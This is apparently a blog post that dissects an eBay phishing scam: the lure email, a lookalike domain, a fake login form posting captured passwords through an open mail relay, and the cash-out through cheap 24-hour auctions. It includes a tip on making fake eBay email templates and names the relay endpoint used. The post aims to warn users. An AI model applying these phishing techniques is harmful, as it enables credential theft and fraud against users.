Anatomy of Ebay Password Theft


Question:
How does one steal another's ebay password?
Answer:
Ask them for it!

If someone else thinks that you're ebay, you can ask them for the password, and they will give it to you.

This is the basic idea behind most phishing scams designed to take your ebay password.

A phisher sends out fraudulent emails that look identical to legitimate ebay emails, hoping that you believe they are actually from Ebay.

In the attack demonstrated here, an email disguised as a "Question about an item" lures the recipient to a fake Ebay login page where your user name and password will be emailed to the phisher.

Here's one such suspect email:
It seems like a legitimate message from ebay to the common user.

It's very easy to create your own template for fake ebay emails. One can simply use the "Ask seller a question" feature, and select the option to have the question emailed to you. Voila, you can be stealing ebay passwords in minutes!

Figures 1 & 2
Ebay QuestionEbay Question

If you place your mouse over the fake links, the real URL appears in the status bar on the bottom of your browser:

The phisher registered the domain "signin-ebay-isapidll2-updatecom.com" to further confuse the user. Since someone may see "signin-ebay" and equate that to the real URL, they may think this email is legitimate.

Fake URL (top) vs Legitimate Ebay Login URL (bottom)
https://signin.ebay.com/ws/eBayISAPI.dll?...
http://signin-ebay-isapidll2-updatecom.com...

Ebay Question Real URL
Ebay Question Real URL

When the unsuspecting user clicks on the "Respond Now" link found in the email, they are taken to a strikingly similar page to the ebay login. There are a lot of flags that would raise for the educated internet user, but the common user would think it looks like the ebay login page, so it must be the ebay login page.

Here I've pulled apart a few striking aspects of the page:


Ebay Fake Login PageEbay Fake Login Page Annotated


Now lets compare the fake page to the legitimate ebay login page:


Real Login vs Fake LoginReal Login vs Fake Login Annotated


Disecting the actual HTML code for the page shows more insight into how this scam actually works.

The "FORM" on the page where you enter your data directs to his page:
"jmailer.starware.com/cgi/mailform.dll"

It is labeled in green as Facilitator.

"What is this?" one may ask. Well, this is what's called an OPEN SMTP RELAY, AND THEY ARE DANGEROUS. This is a "program" that someone posted on the website "starware.com" that allows users to send emails from FORMS. Since they are "OPEN RELAYS", it means that anyone can send it data, and it will email it out. When I say these are dangerous, you should understand why. THEY ALLOW PEOPLE TO STEAL PASSWORDS! Someone was lazy when administrating the "starware.com" website, and this caused ebay users to have their passwords stolen.

The other values are variables that the mailform.dll program accepts. There is an email address that the ebay password information is sent to, as well as that emails subject. In this case the subject is "stol"... as in stolEN INFORMATION. The goto variable is the page that the user is kicked to after they submit their information. In this case it is an ebay page, so the user may think that they actually signed in. Another degree of complexity to confuse users.

Ebay Fake Login CodeEbay Fake Login Code Annotated



Getting your password is the easy part, the hard part is making money with this information.

The phisher will log into your ebay account and post 24 hour auctions for high-dollar items, at low prices. This ensures that people will bid on them, and they can easily get $500-700 per item. Such as here:

items im not selling

Notice they are items which would normally sell for much MORE than the asking price, and they end in less than 24 hours. These auctions are more likely to sell than if they place the item up at regular prices. It's quick cash for the phisher.

Needless to say, I didn't follow the scam any further, as I would have risked actual money at that point.

I hope this was informative, and it will encourage everyone to be weary of ANY correspondence they recieved from ebay. Another thing to note, is that Firefox successfully identified the fake login page as "Suspected Web Forge

Firefox Suspected Web Forgery

Just for kicks here's the auction that the initial email was regarding. It was a legitimate auction, to further help the authenticity of the fake correspondence.

Real Page Honda 2002 CR